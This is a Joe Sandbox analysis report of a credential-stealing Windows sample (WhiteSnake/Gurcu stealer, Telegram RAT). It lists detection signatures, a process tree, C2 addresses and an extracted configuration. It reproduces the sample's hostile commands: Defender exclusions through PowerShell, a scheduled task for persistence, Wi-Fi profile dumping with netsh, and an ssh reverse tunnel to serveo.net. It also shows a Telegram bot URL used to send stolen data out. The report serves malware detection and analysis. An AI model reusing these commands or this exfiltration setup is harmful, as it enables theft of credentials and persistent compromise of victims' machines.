Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Sample name:jqOHOuPMJP.exe
renamed because original name is a hash value
Original sample name:7e9a93c69aecfc2bbda9470fbd4556db.exe
Analysis ID:1390172
MD5:7e9a93c69aecfc2bbda9470fbd4556db
SHA1:ab0e810472a897affac1a761b49595939f6897a9
SHA256:82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Tags:exeWhiteSnakeStealer
Infos:

Detection

Gurcu Stealer, WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Gurcu Stealer
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • jqOHOuPMJP.exe (PID: 6780 cmdline: C:\Users\user\Desktop\jqOHOuPMJP.exe MD5: 7E9A93C69AECFC2BBDA9470FBD4556DB)
    • powershell.exe (PID: 1516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vkefq4cv.oil.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • timeout.exe (PID: 7484 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • schtasks.exe (PID: 7600 cmdline: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • vkefq4cv.oil.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
          • cmd.exe (PID: 7776 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8008 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 8064 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8116 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8156 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • ssh.exe (PID: 4548 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
            • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vkefq4cv.oil.exe (PID: 8072 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
    • cmd.exe (PID: 1196 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2084 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 2004 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6344 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6544 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7316 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7500 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7440 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vkefq4cv.oil.exe (PID: 7712 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 125704 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 325468 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 491576 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}

Threatname: Gurcu Stealer

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
        0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
          00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
                Click to see the 10 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
                  Sigma detected: Communication To Uncommon Destination Ports
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                  Sigma detected: Port Forwarding Activity Via SSH.EXE
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, ProcessId: 4548, ProcessName: ssh.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7420, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , ProcessId: 7600, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Capture Wi-Fi password
                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], ProcessId: 7776, ProcessName: cmd.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                  Source: http://216.250.190.139:80Avira URL Cloud: Label: malware
                  Source: https://192.99.196.191:443Avira URL Cloud: Label: malware
                  Source: http://66.42.56.128:80Avira URL Cloud: Label: malware
                  Source: http://82.147.85.194/byte/@jokerbot880901.txtAvira URL Cloud: Label: malware
                  Source: http://185.217.98.121:80Avira URL Cloud: Label: malware
                  Source: https://44.228.161.50:443Avira URL Cloud: Label: malware
                  Source: https://164.90.185.9:443Avira URL Cloud: Label: malware
                  Source: http://18.228.80.130:80Avira URL Cloud: Label: malware
                  Source: http://185.217.98.121:8080Avira URL Cloud: Label: malware
                  Source: http://pesterbdd.com/i?Avira URL Cloud: Label: malware
                  Source: http://82.147.85.194/byte/Avira URL Cloud: Label: malware
                  Source: https://185.217.98.121:443Avira URL Cloud: Label: malware
                  Source: http://116.202.101.219:8080Avira URL Cloud: Label: malware
                  Source: http://206.189.109.146:80Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: vkefq4cv.oil.exe.8072.18.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
                  Source: vkefq4cv.oil.exe.8072.18.memstrminMalware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
                  Multi AV Scanner detection for domain / URL
                  Source: serveo.netVirustotal: Detection: 7%Perma Link
                  Source: http://216.250.190.139:80Virustotal: Detection: 7%Perma Link
                  Source: http://193.142.58.127:80Virustotal: Detection: 6%Perma Link
                  Source: http://66.42.56.128:80Virustotal: Detection: 8%Perma Link
                  Source: http://185.217.98.121:80Virustotal: Detection: 15%Perma Link
                  Source: https://164.90.185.9:443Virustotal: Detection: 8%Perma Link
                  Source: http://18.228.80.130:80Virustotal: Detection: 10%Perma Link
                  Source: http://185.217.98.121:8080Virustotal: Detection: 11%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: jqOHOuPMJP.exeReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exeVirustotal: Detection: 24%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: jqOHOuPMJP.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: >{tnnsqc7~br
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: >tyy`ejj/euh5tx,r
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 9s{tgd}b}~yr
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: ,yqdr,j!)/$"+}$#.~!%-$'-,+rzy"$xz&'),##z)wr.-#
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: fn{m8Gq}pjjf"gw~f+~~kg}{
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: jkK\k
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: -{whzMWg1sq&G
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: fbnu8ci*OJ ~{~t
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: faww8i}fpkdmmjq
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 3&k-m88"+89"+8:"+
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: .dylpGul=`hz#o}
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: flq8JSNR[YPQ
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 88r`bE:~!ba}<}!pvvfs|1~q9o{d(us8:>!sme`''ml29o)r,c|}!|!vqr:
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B9784B1 CryptUnprotectData,11_2_00007FFD9B9784B1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B9785FD CryptUnprotectData,11_2_00007FFD9B9785FD
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B9784A1 CryptUnprotectData,18_2_00007FFD9B9784A1
